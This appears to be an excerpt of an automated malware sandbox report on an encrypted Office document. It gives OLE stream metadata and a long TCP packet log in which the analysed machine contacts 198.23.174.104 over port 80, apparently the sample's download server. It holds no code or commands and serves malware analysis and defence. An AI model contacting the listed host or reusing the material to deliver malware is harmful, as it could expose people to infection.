Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 2247976

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	2247976
Entropy:	7.9999090543
Base64 Encoded:	True
Data ASCII:	. M " . . . . . . 8 : 2 . j B . . C S . . . . e . ) . a . O * . v , . . \\ [ . . . c . = ) . / X . . . . . X . . L 1 . . b . . . . . . . . . ^ . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . .
Data Raw:	18 4d 22 00 00 00 00 00 06 38 3a 32 d0 6a 42 c2 ac 43 53 19 99 a1 05 65 f9 29 01 61 19 4f 2a 8e 76 2c cf ba 5c 5b e4 fc 15 63 9e 3d 29 dc 2f 58 bd 11 d1 08 e8 58 f3 08 4c 31 c0 2e 62 ad 03 8d 1d e5 e7 96 fc ad 5e b0 5a 12 9e e2 87 cc 94 f6 4d 03 f0 cc 6f 8f 36 bb 5a 12 9e e2 87 cc 94 f6 4d 03 f0 cc 6f 8f 36 bb 5a 12 9e e2 87 cc 94 f6 4d 03 f0 cc 6f 8f 36 bb 5a 12 9e e2 87 cc 94 f6

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.51192910595
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . c . . ? v . . 0 . . . . . . W P . . . . 5 . @ N . { . . . . . 6 . . . k . d . . . . { . . . . . . S ( . [ 5 ] . . } r P ] S .
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 12:50:31.962682009 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.079775095 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.079906940 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.080419064 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.198482990 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.198522091 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.198553085 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.198596001 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.198673964 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.199275970 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.315244913 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.315275908 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.315309048 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.315332890 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.315356016 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.315390110 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.315411091 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.315428972 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.315432072 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.315435886 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.315458059 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.315474033 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.315493107 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.431818008 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.431879997 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.431904078 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.431936979 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.431961060 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.431984901 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.432029009 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.432071924 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.432095051 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.432121992 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.432147026 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.432168961 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.432169914 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.432199955 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.432203054 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.432204962 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.432271004 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.432315111 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.432434082 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.432459116 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.432482958 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.432502985 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.432527065 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.432569027 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.440557003 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.554275990 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.554326057 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.554348946 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.554371119 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.554395914 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.554445982 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.554471970 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.554518938 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.554544926 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.554584980 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.554609060 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.554627895 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.554641962 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.554719925 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.554763079 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.554778099 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.554802895 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.554820061 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.554825068 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.554832935 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.554862976 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.554871082 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.554907084 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.555037022 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.555099010 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.555125952 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.555155039 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.555165052 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.555176973 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.555187941 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.555200100 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.555233955 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.555248976 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.555303097 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.555325985 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.555344105 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.555355072 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.555418968 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.555459023 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.555469990 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.555507898 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.555516958 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.555555105 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.555633068 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.555670977 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.555679083 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.555711031 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.555711031 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.555747986 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.555783987 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.555819035 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.555875063 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.555912018 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.556452990 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.670854092 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.670892954 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.670928955 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.670978069 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671003103 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671047926 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671062946 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671066999 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671083927 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671086073 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671111107 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671125889 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671134949 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671183109 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671200991 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671241999 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671279907 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671300888 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671330929 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671334982 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671359062 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671391964 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671403885 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671423912 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671426058 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671451092 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671459913 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671485901 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671500921 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671509981 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671540976 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671564102 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671569109 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671571970 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671592951 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671597004 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671627045 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671648979 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671652079 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671664953 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671680927 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671699047 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671720982 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671742916 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.671744108 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.671766996 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.672307968 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.672583103 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.672627926 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.672656059 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.672682047 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.672704935 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.672708988 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.672743082 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.672744989 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.672766924 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.672776937 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.672791958 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.672820091 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.672825098 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.672858953 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.672859907 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.672883034 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.672908068 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.672926903 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.673016071 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.673043013 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.673047066 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.673084021 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.673116922 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.673121929 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.673144102 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.673145056 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.673166990 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.673182011 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.673198938 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.673222065 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.673223019 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.673243999 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.673255920 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.673321962 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.680555105 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.787461042 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.787525892 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.787549973 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.787580013 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.787600994 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.787621975 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.787645102 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.787669897 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.787695885 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.787724018 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.787727118 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.787729025 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.790492058 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.790518045 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.790585041 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.790607929 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.790620089 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.790673018 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.790710926 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.790731907 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.790766001 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.790776014 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.790792942 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.790801048 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.790817976 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.790827036 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.790863991 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.790880919 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.790889978 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.790905952 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.790915966 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.790935040 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.790952921 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.790958881 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.790992022 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.791002035 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.791045904 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.791063070 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.791069984 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.791086912 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.791099072 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.791107893 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.791277885 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.791291952 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.791304111 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.791326046 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.791332960 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.791344881 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.791377068 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.792289972 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.796766996 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.796807051 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.796832085 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.796900034 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.796900988 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.796935081 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.796940088 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.796941996 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.796977997 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.796977997 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.797004938 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.797022104 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.797035933 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.797044039 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.797061920 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.797084093 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.797151089 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.797175884 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.797236919 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.797265053 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.797269106 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.797290087 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.797313929 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.797346115 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.797349930 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.797391891 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.797394991 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.797421932 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.797446966 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.797470093 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.797470093 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.797492981 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.797522068 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.797523022 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.797544003 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.797547102 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.797554970 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.797595978 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.797599077 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.797636032 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.797693968 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.798712969 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.904031038 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.904084921 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.904109955 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.904126883 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.904144049 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.904165983 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.904184103 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.904187918 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.904232025 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.904251099 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.904278994 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.904294014 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.904306889 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.904310942 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.904342890 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.904347897 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.904370070 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.904381990 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:32.904406071 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:32.904406071 CEST	49167	80	192.168.2.22	198.23.174.104
